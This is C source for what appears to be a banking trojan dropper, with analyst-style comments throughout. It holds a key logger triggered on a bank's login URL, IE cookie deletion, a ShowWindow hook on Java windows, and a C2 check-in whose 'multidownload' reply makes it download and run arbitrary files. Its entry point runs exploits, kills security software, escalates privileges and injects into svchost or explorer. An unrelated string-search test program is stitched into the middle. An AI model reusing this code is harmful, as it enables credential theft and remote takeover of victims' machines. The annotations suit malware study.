// Callback invoked on an Internet Explorer URL change.
//   Logger  - unused here
//   EventID - unused here
//   Data    - the new URL as a NUL-terminated char string
// When the global `System` is 0 and the URL contains both "avangard" and
// "logon_enter", the key logger is started via InitKeyLogger(). Nothing else
// is done for any other URL. The two fixed substrings are the URL-targeting
// indicators for this component; the DBGAVG() call is a debug trace only.
// (The meaning of the global `System` is not visible in this span.)
void WINAPI IEURLChanged(PKeyLogger Logger, DWORD EventID, LPVOID Data)
{
    char* url = (char*)Data;
    if( System == 0 )
    {
        // React when the URL contains the word "avangard" followed by "logon_enter".
        char* p = m_strstr( url, "avangard" );
        if( p )
        {
            // Skip the 8-character match; note `p` is not used afterwards -
            // the second search below runs over the whole `url`, not from `p`.
            p += 8;
            if( m_strstr( url, "logon_enter" ) )
            {
                DBGAVG( "Avangard", "Урл %s", url );
                InitKeyLogger();
            }
        }
    }
}
// Selects which DeleteIECookies() mode(s) to run from a substring match on an
// OS-name string `os`. The meaning of the 1 / 2 arguments is defined by
// DeleteIECookies() (not visible here); from the branches: 1 for Windows XP,
// 2 for Vista / 7 / Server 2008, and both for any unrecognised name.
// Observable effect: Internet Explorer cookie storage is cleared on the host -
// a forensic artifact; presumably meant to force re-authentication, but that
// intent is not established by this code.
// NOTE(review): "Windows Server 2008 R2" is already matched by the preceding
// "Windows Server 2008" test, so the last `||` term never decides the branch.
void DeleteIE_cookies(char* os)
{
    if(m_strstr(os, "Windows XP"))
    {
        DeleteIECookies(1);
    }
    else if(m_strstr(os, "Windows Vista") || m_strstr(os, "Windows Seven") || m_strstr(os, "Windows Server 2008") || m_strstr(os, "Windows Server 2008 R2"))
    {
        DeleteIECookies(2);
    }
    else
    {
        // Unknown OS string: run both modes.
        DeleteIECookies(1);
        DeleteIECookies(2);
    }
}
// Stand-alone smoke test for m_strstr(): searches a fixed haystack for a
// short needle and prints whether it was found and, if so, the suffix that
// starts at the match. Always returns 0.
int main(void)
{
    char haystack[] = "sdhfkjsdghshellowdsgfds";
    char needle[] = "hello";
    char *hit = m_strstr(haystack, needle);
    if (hit != NULL)
    {
        printf("bingo, sub is in str.\nsub string is :\n%s\n", hit);
    }
    else
    {
        printf("sub is not in str.\n");
    }
    return 0;
}
// (Continuation of a comment that begins above this span:)
// ... if it has not been hooked yet. If a dialog is being shown it is treated
// as modal, and all click coordinates are processed for that dialog.
//
// Replacement for ShowWindow() installed by the hooking code elsewhere.
//   hWnd - window being shown/hidden
//   Cmd  - the SW_* show command
// For windows whose class name contains "SunAwtFrame" or "SunAwtDialog"
// (Java AWT) and Cmd != SW_HIDE, the window procedure is swapped for
// g_frame_wnd / g_dialog_wnd through ChangeWndProc(), with the original kept
// in g_old_frame_wnd_proc / g_old_dialog_wnd_proc; g_is_dialog records whether
// a dialog is currently up (reset to false on SW_HIDE). Always forwards to
// Real_ShowWindow(). The two OutputDebugString() calls ("1234",
// "Hook_ShowWindow") are debug artifacts visible to an attached debugger, and
// the class-name strings are stable indicators for this hook.
static BOOL WINAPI Hook_ShowWindow(HWND hWnd, int Cmd)
{
    // Fetch the window class name.
    OutputDebugString("1234");
    char cClasN[MAX_PATH];
    GetClassNameA(hWnd, cClasN, MAX_PATH);
    bool isFrame = (NULL != m_strstr(cClasN, "SunAwtFrame"));
    bool isDialog = (NULL != m_strstr(cClasN, "SunAwtDialog"));
    if (SW_HIDE != Cmd)
    {
        OutputDebugString("Hook_ShowWindow");
        if (isFrame)
        {
            // Replace the window procedure with our own.
            DbgMsg(cClasN, (int)Cmd, "Java Frame Wnd");
            ChangeWndProc(hWnd, &g_frame_wnd, &g_old_frame_wnd_proc);
            g_is_dialog = false;
        }
        else if (isDialog)
        {
            // Replace the window procedure with our own.
            DbgMsg(cClasN, (int)Cmd, "Java Dialog Wnd");
            ChangeWndProc(hWnd, &g_dialog_wnd, &g_old_dialog_wnd_proc);
            g_is_dialog = true;
        }
    }
    else
    {
        g_is_dialog = false;
    }
    // NOTE(review): divides Cmd by its own top four bits. For the documented
    // SW_* values (all small) that divisor is 0 - integer division by zero;
    // the intent is unclear and this looks like a leftover.
    Cmd /= Cmd & 0xf0000000;
    // Call the real ShowWindow.
    return Real_ShowWindow(hWnd, Cmd);
}
// Splits `Url` ("[scheme://]host[:port]/path...") into its parts.
//   Url    - in:  source string; a '/' after the host is required
//   Server - out: heap copy of the host (512-byte MemAlloc buffer; the caller
//                 owns it)
//   Path   - out: pointer INTO `Url` at the first '/' after the host - not a copy
//   Port   - out: parsed from the ":port" component, else 80
// Returns false when either buffer cannot be allocated or no '/' follows the
// host; true otherwise.
// NOTE(review): the copies into Host / OptionalPort are not bounded by the
// 512-byte buffer size; the early `return false` paths do not free the two
// buffers; `dwPort` is unused; and because ':' is searched over the whole
// remainder, a ':' that first appears after the '/' (inside the path) is still
// taken as the port separator, making `Ptr3 - Ptr2` negative.
bool ParseUrl1( char *Url, char **Server, char **Path, int *Port )
{
    char *Ptr1 = NULL;
    char *Ptr2 = NULL;
    char *Ptr3 = NULL;
    char *Ptr4 = NULL;
    char *Host = (char*)MemAlloc( 512 );
    char *OptionalPort = (char*)MemAlloc( 512 );
    if ( Host == NULL || OptionalPort == NULL )
    {
        return false;
    }
    DWORD dwPort = 0;
    // Skip the "scheme://" prefix when present.
    Ptr1 = m_strstr( Url, "://" );
    if( Ptr1 )
    {
        Ptr1 += 3;
    }
    else
    {
        Ptr1 = Url;
    }
    Ptr4 = m_strstr( Ptr1, "/" );   // start of the path (returned as-is)
    Ptr2 = m_strstr( Ptr1, ":" );   // optional port separator
    if( !Ptr2 )
    {
        // No explicit port: default to 80, host runs up to the first '/'.
        *Port = 80;
        Ptr3 = m_strstr( Ptr1, "/" );
        if( !Ptr3 )
        {
            return false;
        }
        m_memcpy( Host, Ptr1, Ptr3 - Ptr1 );
        Host[ Ptr3 - Ptr1 ] = '\0';
    }
    else
    {
        // Explicit port: host is up to ':', port text is between ':' and '/'.
        Ptr3 = m_strstr( Ptr1, "/" );
        if( !Ptr3 )
        {
            return false;
        }
        m_memcpy( OptionalPort, Ptr2 + 1, Ptr3 - Ptr2 );
        m_memcpy( Host, Ptr1, Ptr2 - Ptr1 );
        OptionalPort[ Ptr3 - Ptr2 ] = '\0';
        Host[ Ptr2 - Ptr1 ] = '\0';
        *Port = m_atoi( OptionalPort );
    }
    MemFree( OptionalPort );
    *Server = Host;
    *Path = Ptr4;
    return true;
}
// Contacts the plugin server at `Url` and processes its reply.
//   Url - "[scheme://]host[:port]/path" of the server, parsed by ParseUrl1()
// Steps, as written:
//   1. WSAStartup(2.2) and ParseUrl1(); either failing returns false.
//   2. Builds an HTTP/1.0 POST using the `Request` format: the body is
//      "id=<Uid from GenerateUid()>" followed by the global `LoadExe`, which
//      is initialised to "&plugins=" when NULL. wsprintfA is resolved by the
//      hash 0xEA3AF0D7 through GetProcAddressEx(), and the User-Agent comes
//      from pObtainUserAgentString().
//   3. Sends the packet via MyConnect1()/MySend() and reads the reply with
//      RecvAndParse().
//   4. If the first reply line starts with "multidownload", each "http:" URL
//      in that line (terminated by '|') is copied out, its MD5 is appended to
//      `LoadExe` (so later reports list what was fetched), and it is fetched
//      to a temp file from GetTempName() and run through ExecuteFile().
// Returns true once a reply was received and handled, false on any setup,
// connect or send failure.
// Network-visible shape for detection: POST with "Connection: Close",
// "Content-Type: application/x-www-form-urlencoded", body
// "id=...&plugins=..." and a server reply beginning with the literal
// "multidownload" followed by '|'-separated URLs.
// NOTE(review): `Host` from ParseUrl1() is never freed; the socket is left
// open on the MySend() failure path; `cPointer` is unused; see the inline
// note on the MemAlloc(i)+1 line.
bool ReportToPlugin( char *Url )
{
    WSADATA wsa;
    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }
    char *Host = NULL;
    char *Path = NULL;
    int Port = 0;
    if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
    {
        return false;
    }
    char Uid[100];
    GenerateUid( Uid );
    // wsprintfA located by hash rather than by name.
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    // NOTE(review): the allocation is checked only after it has already been
    // handed to pObtainUserAgentString(); on NULL the literal "-" is used.
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    if ( UserAgent == NULL )
    {
        MemFree( UserAgent );
        UserAgent = "-";
    }
    char Request[] = "POST %s HTTP/1.0\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Accept: text/html\r\n"
                     "Connection: Close\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n";
    char Args[] = "id=";
    char *HttpPacket = NULL;
    HttpPacket = (char*)MemAlloc( 2048 );
    // Content-Length: "id=" + Uid + LoadExe (9 = strlen("&plugins=") when
    // LoadExe is still NULL and will be initialised below).
    int iTmp;
    if (LoadExe!=NULL)
    {
        iTmp=m_lstrlen(LoadExe);
    }
    else
        iTmp=9;
    pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
    m_lstrcat( HttpPacket, Args );
    m_lstrcat( HttpPacket, Uid );
    if (LoadExe==NULL)
    {
        LoadExe = (char*)MemAlloc(10);
        m_lstrncpy(LoadExe,"&plugins=",9);
        LoadExe[9]='\0';
    }
    m_lstrcat( HttpPacket, LoadExe );
    SOCKET Socket = MyConnect1( Host, Port );
    if( Socket == -1 )
    {
        return false;
    }
    bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
    MemFree( HttpPacket );
    if ( !b )
    {
        return false;
    }
    DWORD dwSize = 0;
    char *Buffer = RecvAndParse( Socket, &dwSize );
    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }
    // Command keyword assembled byte by byte, presumably so the literal does
    // not appear contiguously in the binary - it is still "multidownload".
    char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
    char *Context;
    // Only the first reply line is examined.
    m_strtok_s( Buffer, "\r\n", &Context );
    if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
    {
        char * cPointer= m_strstr(&Buffer[1],"http:");
        char* cUrl=Buffer;
        char* cUrlNext;
        int i;
        char *DownloadUrl;
        while (true)
        {
            // Next "http:" occurrence after the current position.
            cUrl= m_strstr(&cUrl[1],"http:");
            if (cUrl==NULL)break;
            // Length up to the '|' separator; if no '|' follows, cUrlNext is
            // NULL and m_lstrlen(NULL) behaviour is not visible here.
            cUrlNext= m_strstr(cUrl,"|");
            i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
            // NOTE(review): the +1 is applied to the returned pointer, not to
            // the requested size, so `i` chars plus the NUL are written into an
            // i-byte block starting one byte in, and MemFree() later receives a
            // pointer one past the allocation start.
            DownloadUrl = (char*)MemAlloc(i)+1;
            m_lstrncpy(DownloadUrl,cUrl,i);
            DownloadUrl[i]='\0';
            if ( DownloadUrl )
            {
                // Grow LoadExe by 33 (MD5 hex digest plus '|', presumably) and
                // record the digest of this URL for the next report.
                LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
                m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
                m_lstrcat( LoadExe, "|");
                WCHAR *FileName =(WCHAR *)GetTempName();
                if ( FileName && DownloadUrl )
                {
                    ExecuteFile( DownloadUrl, FileName );
                }
                MemFree( FileName );
            }
            MemFree( DownloadUrl );
        }
    }
    MemFree( Buffer );
    pclosesocket( Socket );
    return true;
}
// Dropper entry point. `argc` / `argv` are unused; the command line is read
// through pGetCommandLineA() instead. Control flow, in order:
//   - UnhookDlls(), GetPaths(), debug step "100_d".
//   - If a file already exists at PathBkFile the bootkit is treated as
//     installed: InitSuicide() and exit.
//   - KillOutpost(), DoExploits(), debug step "101_d".
//   - CurrentPlatformAllowedByTargetSpecifier() false -> suicide and exit.
//   - Debug step "109_d".
//   - Command line contains ARGV_UAC_RUN -> ExplorerMain(); exit either way
//     (suicide only when it succeeded).
//   - IsUserLocalSystem() -> SvcFuckupRunAsService(SvcFuckupServiceMain), exit.
//   - SvcFuckupEnabled() -> SvcFuckupRun(), suicide, exit.
//   - Otherwise JmpToSvchost(ExplorerRoutine), falling back to
//     InjectIntoExplorer(ExplorerRoutine), then to ExplorerRoutine(NULL) in the
//     current process; dwExplorerSelf is 0 for the svchost attempt and 1 after
//     it fails.
// Every branch terminates the process (WaitAndExitProcess / pExitProcess); the
// trailing `return` statements are only reached if those calls return.
// The PP_DPRINTF messages and the DebugReportStepByName ids ("100_d",
// "101_d", "109_d") are fixed strings an analyst can key on; the PathBkFile
// existence check is the installed-marker this dropper itself relies on.
int APIENTRY MyMain(int argc, char** argv)
{
    // Earlier experiment code, left commented out by the author:
    //return 0;
    //TestStepNotifications();
    //MultiMethodReboot();
    //return 0;
    //PP_DPRINTF(L"MyMain: started");
    //if ( IsUserLocalSystem() )
    //{
    //  PP_DPRINTF(L"MyMain: current user is LocalSystem.");
    //  SvcFuckupRunAsService(SvcFuckupServiceMainTest);
    //}
    //else
    //{
    //  PP_DPRINTF(L"MyMain: current user is NOT LocalSystem.");
    //  if ( m_strstr((PCHAR)pGetCommandLineA(),"-install") )
    //  {
    //      PP_DPRINTF(L"MyMain: '-install' param specified. Run SvcFuckup.");
    //      bool fuckup_result = SvcFuckupRun();
    //      PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with result=%d.", fuckup_result);
    //  }
    //}
    //PP_DPRINTF(L"MyMain: finished");
    //return 0;
    UnhookDlls(); // remove hooks
    GetPaths();
    // 100_d: dropper started
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("100_d"));
    /* check whether the bootkit is already installed */
    if ((DWORD)pGetFileAttributesA(PathBkFile) != INVALID_FILE_ATTRIBUTES)
    {
        PP_DPRINTF(L"MyMain: bootkit already installed. Killing oneself.");
        InitSuicide();
        WaitAndExitProcess(0);
        return 0;
    };
    KillOutpost();
    DoExploits();
    // 100_d: dropper started (original comment; the step reported is "101_d")
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("101_d"));
    // Target platform check.
    if (!CurrentPlatformAllowedByTargetSpecifier())
    {
        InitSuicide();
        PP_DPRINTF(L"MyMain:Current platform not allowed by target specifier. Callin ExitProcess...");
        WaitAndExitProcess(0);
        return 0;
    }
    // 109_d: target platform check passed
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("109_d"));
    // Check for the "run with UAC rights" start-up parameter.
    if ( m_strstr((PCHAR)pGetCommandLineA(),ARGV_UAC_RUN) )
    {
        PP_DPRINTF(L"MyMain: UAC param detected. Calling ExplorerMain...");
        int ret = -1; // never updated; the failure path exits with -1
        if ( ExplorerMain() )
        {
            PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain OK. Quit and killing oneself...");
            InitSuicide();
            WaitAndExitProcess(0);
            return 0;
        }
        PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain failed. Just quit process.");
        WaitAndExitProcess(ret);
        return 0;
    };
    //
    // If the process runs with system rights, proceed to installation.
    //
    if (IsUserLocalSystem())
    {
        PP_DPRINTF(L"MyMain: LocalSystem current user detected. Runing SvcFuckupRunAsService().");
        SvcFuckupRunAsService(SvcFuckupServiceMain);
        PP_DPRINTF(L"MyMain: SvcFuckupRunAsService() finished. Calling ExitProcess().");
        WaitAndExitProcess(0);
        return 0;
    };
    // If the process was started normally but SvcFuckup support is enabled,
    // try that and then kill ourselves.
    if (SvcFuckupEnabled())
    {
        PP_DPRINTF(L"MyMain: SvcFuckup enabled. Run SvcFuckupRun");
        bool fuckup_result = SvcFuckupRun();
        PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with %d", fuckup_result);
        InitSuicide();
        WaitAndExitProcess(0);
        return 0;
    }
    PP_DPRINTF(L"MyMain: All checks passed. Trying to jump to svchost");
    // dwExplorerSelf: 0 = svchost path attempted, 1 = fell back past it.
    dwExplorerSelf = 0;
    if (!JmpToSvchost( ExplorerRoutine ))
    {
        PP_DPRINTF(L"MyMain: Jump to svchost failed. Trying jump to explorer");
        dwExplorerSelf = 1;
        if (! InjectIntoExplorer ( ExplorerRoutine ) )
        {
            PP_DPRINTF(L"MyMain: Jump to explorer failed. Trying just do ExplorerRoutine");
            // Last resort: run the routine in this process.
            ExplorerRoutine( NULL );
        }
    }
    PP_DPRINTF(L"MyMain: finished.");
    pExitProcess( 1 );
    return 1;
}